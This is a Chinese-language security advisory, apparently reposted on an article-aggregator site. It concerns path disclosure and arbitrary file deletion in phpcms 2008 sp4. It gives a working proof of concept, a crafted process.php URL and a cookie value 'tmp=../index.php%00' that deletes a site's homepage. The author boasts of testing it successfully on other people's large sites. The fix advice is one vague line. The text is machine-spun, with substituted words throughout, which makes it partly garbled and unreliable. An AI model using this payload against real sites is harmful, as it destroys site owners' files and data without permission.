当前位置:七道奇文章资讯安全技术网络技术
日期:2010-09-07 00:18:00  来源:本站整理

phpcms 2008 sp4 爆途径及肆意文件删除漏洞及修复[网络技术]

赞助商链接



  本文“phpcms 2008 sp4 爆途径及肆意文件删除漏洞及修复[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:

公布日期:2010-09.05
公布作者:CnCxzSec(衰仔)
影响版本:phpcms 2008 sp4
官方地址:www.phpcms.cn
漏洞范例:爆途径及肆意文件删除
漏洞描写:某页面下,未作容错处理招致爆途径,同时过滤不严招致恶意攻击者可以删除网站肆意文件


具体阐明:corpandresize/config.inc.php中定义:

$tmp = $_COOKIE['tmp'];

define("TMP_PATH", $tmp);
在corpandresize/process.php顶用到TMP_PATH,满意前面的一系列条件后(这个很好满意,都是用户可控的):

76: @unlink(TMP_PATH.'/'.$thumbfile);

没有查抄$_COOKIE['tmp']就直接放入unlink()了,只要改正cookie便可以删除网站的肆意文件.

谷歌了一下,发现网上有人在本年5月份公开过同目录下另一个文件造成的爆途径问题(http://lcx.cc/?FoxNews=123.html),但解析得不够具体,操纵办法也稍显麻烦,这里给出的操纵方法更简单.


漏洞证明:注册用户登陆后拜候

http://localhost/phpcms/corpandresize/process.php?pic=../images/logo.gif
此时爆出绝对途径(当汇集信息,没什么好操纵的)

在cookie中增添一句(或改正原有值)tmp=../index.php%00便可删除首页文件

测试的时刻发现官方demo站不成功...但是本地测试ok(官方最新安装包),在网上找大站测试,一打一个准~

修复筹划:

改正容错处理,加强过滤


  以上是“phpcms 2008 sp4 爆途径及肆意文件删除漏洞及修复[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
  • <b>Linux 下 Nginx phpcgi 的安装及配置</b>
  • phpCB配合ultraedit美化PHP代码
  • Phpcms2008本地文件包含漏洞及操纵:肆意SQL语句履行
  • PhpCms2008 注射漏洞0day及修复
  • phpcms 2008 sp4 爆途径及肆意文件删除漏洞及修复
  • PHPCMS通杀XSS及修复
  • PHPCMS2008使改正文章后文章时间仍为发表时的时间
  • 本文地址: 与您的QQ/BBS好友分享!
    • 好的评价 如果您觉得此文章好,就请您
        0%(0)
    • 差的评价 如果您觉得此文章差,就请您
        0%(0)

    文章评论评论内容只代表网友观点,与本站立场无关!

       评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论
    Copyright © 2020-2022 www.xiamiku.com. All Rights Reserved .